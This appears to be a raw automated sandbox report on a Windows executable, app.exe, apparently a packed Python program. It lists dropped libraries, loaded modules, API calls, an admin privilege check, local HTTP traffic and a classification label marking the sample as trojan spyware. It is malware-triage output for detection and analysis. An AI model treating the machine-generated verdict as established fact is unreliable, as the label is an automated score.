    Source: api-ms-win-core-file-l2-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-debug-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-profile-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-localization-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-datetime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-math-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-time-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: python3.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-handle-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-2-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-utility-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-string-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: api-ms-win-core-memory-l1-1-0.dll.0.dr Static PE information: No import functions for PE file found
    Source: app.exe Binary or memory string: OriginalFilename vs app.exe
    Source: classification engine Classification label: mal56.troj.spyw.winEXE@3/196@0/1
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE87420 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7ACE87420
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A80AA6F0 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,2_2_00007FF8A80AA6F0
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282
    Source: app.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\app.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\app.exe File read: C:\Users\user\Desktop\app.exe
    Source: unknown Process created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
    Source: C:\Users\user\Desktop\app.exe Process created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
    Source: C:\Users\user\Desktop\app.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: vcruntime140.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: libffi-7.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: libcrypto-1_1.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: libssl-1_1.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: libopenblas.fb5ae2tyxyh2ijrdkgdgq3xbklktf43h.gfortran-win_amd64.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: msvcp140.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: vcruntime140_1.dll
    Source: C:\Users\user\Desktop\app.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\app.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
    Source: app.exe Static PE information: Image base 0x140000000 > 0x60000000
    Source: app.exe Static file information: File size 27056395 > 1048576
    Source: app.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: app.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: app.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: app.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: app.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: app.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: app.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: app.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: app.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: app.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: app.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: app.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: VCRUNTIME140_1.dll.0.dr Static PE information: 0xD234ED7D [Fri Oct 3 02:27:09 2081 UTC]
    Source: app.exe Static PE information: section name: _RDATA
    Source: libcrypto-1_1.dll.0.dr Static PE information: section name: .00cfg
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: .xdata
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /4
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /19
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /31
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /45
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /57
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /70
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /81
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.dr Static PE information: section name: /92
    Source: libssl-1_1.dll.0.dr Static PE information: section name: .00cfg
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A80DD5EA push rdx; retf 2_2_00007FF8A80DD5EB
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-errorhandling-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\bcrypt\_bcrypt.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_cffi_backend.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-runtime-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\select.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-rtlsupport-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-2-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l2-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_generator.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cfb.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD5.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des3.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\python38.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-environment-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-utility-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Math\_modexp.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ctr.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_bounded_integers.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_eksblowfish.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_rust.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-process-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-stdio-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32evtlog.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\backend_c.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32api.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA384.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA1.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-debug-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-localization-l1-2-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_philox.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_portable.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_umath.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-util-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-locale-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_bz2.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_overlapped.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32pdh.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cbc.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_brotli.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA512.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-profile-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-heap-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ecb.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_multiprocessing.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_RIPEMD160.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-interlocked-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_hashlib.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ec_ws.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_strxor.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA256.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_tests.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_sfc64.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2b.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_elementtree.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_ctypes.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-memory-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_poly1305.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-heap-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\libcrypto-1_1.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_lzma.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_keccak.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-console-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\libffi-7.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\simplejson\_speedups.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_pcg64.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\libssl-1_1.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Util\_cpuid_c.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_SHA224.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\pywintypes38.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_win32sysloader.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-time-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processenvironment-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-string-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\_umath_linalg.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\win32wnet.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\psutil\_psutil_windows.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-sysinfo-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aesni.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed25519.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\bit_generator.cp38-win_amd64.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_ghash_clmul.pyd
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-synch-l1-1-0.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\MSVCP140.dll
    Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\_MEI22282\_asyncio.pyd
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\VCRUNTIME140.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_queue.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\VCRUNTIME140_1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cast.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_ed448.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_chacha20.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\pyexpat.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\python3.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Protocol\_scrypt.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography\hazmat\bindings\_openssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\lapack_lite.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_MD4.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_mt19937.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_ssl.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft\_pocketfft_internal.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\unicodedata.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ofb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aes.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ocb.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_common.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\_cffi.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_arc2.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-file-l1-2-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_socket.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\ucrtbase.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\mtrand.cp38-win_amd64.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\_decimal.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey\_x25519.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash\_BLAKE2s.pydJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49706
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 5000
    Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49707
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE83DD0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF7ACE83DD0
    Source: C:\Users\user\Desktop\app.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16062
    Source: C:\Users\user\Desktop\app.exeAPI coverage: 0.8 %
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE87790 FindFirstFileExW,FindClose,0_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7ACEA08E4
